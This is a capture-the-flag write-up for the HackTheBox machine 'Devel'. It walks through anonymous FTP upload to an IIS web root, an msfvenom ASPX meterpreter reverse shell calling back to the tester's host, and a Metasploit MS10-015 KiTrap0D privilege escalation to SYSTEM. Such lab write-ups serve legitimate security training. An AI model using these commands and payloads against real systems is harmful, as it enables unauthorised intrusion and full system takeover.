HackTheBox - Devel

Updated 29-03-2026
#htb #hackthebox #ctf #writeup #windows #msfvenom #ftp #privilege-escalation #iis #anonymous-ftp #file-upload #aspx #metasploit #meterpreter #ms10-015 #kitrap0d #local-exploit-suggester #windows-server-2008

A classic retired Windows machine that chains anonymous FTP write access with an unpatched kernel vulnerability to achieve full system compromise.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ sudo nmap -sC -sV -Pn 10.129.15.142
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-03 20:06 -0500
Nmap scan report for 10.129.15.142
Host is up (1.1s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.13 seconds

Two ports are open:

  • 21/tcp — Microsoft FTP with anonymous login allowed; the directory listing already shows IIS web root files (iisstart.htm, welcome.png)
  • 80/tcp — Microsoft IIS 7.5 serving a default IIS page

The fact that the FTP listing mirrors the IIS web root is the key finding — if anonymous FTP has write access, we can upload a payload and trigger it over HTTP.

Foothold

Hosts File

1
$ echo '10.129.15.142 devel.htb' | sudo tee -a /etc/hosts

FTP Enumeration

The website serves only the default IIS page with nothing useful. Connecting to FTP anonymously confirms the directory is the IIS web root:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ ftp devel.htb    
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49176|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp>

Testing write access confirms anonymous users can create and delete directories:

1
2
3
4
ftp> mkdir test
257 "test" directory created.
ftp> rmdir test
250 RMD command successful.

Uploading a Reverse Shell

Since the server runs IIS and the aspnet_client folder is present, it supports ASP.NET. We generate an ASPX reverse shell payload with msfvenom:

1
2
3
4
5
6
7
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=4444 -f aspx -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of aspx file: 3696 bytes
Saved as: shell.aspx

Upload the payload via FTP:

1
2
3
4
5
6
7
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49178|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************| 15969       80.57 MiB/s    --:-- ETA
226 Transfer complete.
15969 bytes sent in 00:00 (36.37 KiB/s)

Start a Metasploit listener before triggering the payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ msfconsole
msf > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.10.16.4
LHOST => 10.10.16.4
msf exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 12.
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) > 
[*] Started reverse TCP handler on 10.10.16.4:4444

Trigger the payload by requesting the uploaded file over HTTP:

1
$ curl http://devel.htb/shell.aspx

A Meterpreter session opens:

1
2
3
4
5
6
7
[*] Sending stage (190534 bytes) to 10.129.15.142
meterpreter > [*] Meterpreter session 10 opened (10.10.16.4:4444 -> 10.129.15.142:49202) at 2026-03-03 

msf exploit(multi/handler) > sessions 10
[*] Starting interaction with 10...

meterpreter >

Privilege Escalation

MS10-015 — KiTrap0D

Background the session and run local_exploit_suggester to identify applicable local privilege escalation exploits for this host:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter > background
[*] Backgrounding session 10...
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set SESSION 10
SESSION => 10
msf post(multi/recon/local_exploit_suggester) > run
[*] 10.129.15.142 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/lib/rex/proto/ldap.rb:13: warning: already initialized constant Net::LDAP::WhoamiOid
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/net-ldap-0.20.0/lib/net/ldap.rb:344: warning: previous definition of WhoamiOid was here
[*] 10.129.15.142 - 239 exploit checks are being tried...
[+] 10.129.15.142 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.129.15.142 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.15.142 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.129.15.142 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.

<-SNIP->

Working through the suggestions, exploit/windows/local/ms10_015_kitrap0d succeeds. MS10-015 (KiTrap0D) is a kernel vulnerability in the Windows #GP trap handler that allows a local user to gain SYSTEM privileges by exploiting improper handling of certain processor exceptions:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf exploit(exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move) > use windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.16.4
LHOST => 10.10.16.4
msf exploit(windows/local/ms10_015_kitrap0d) > set LPORT 1234
LPORT => 1234
msf exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.16.4:1234 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 4076 launched.
[*] Reflectively injecting the DLL into 4076...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (190534 bytes) to 10.129.15.142
[*] Meterpreter session 4 opened (10.10.16.4:1234 -> 10.129.15.142:49162) at 2026-03-03 21:43:07 -0500

meterpreter >

A new Meterpreter session opens with NT AUTHORITY\SYSTEM privileges. Both the user and root flags can now be retrieved.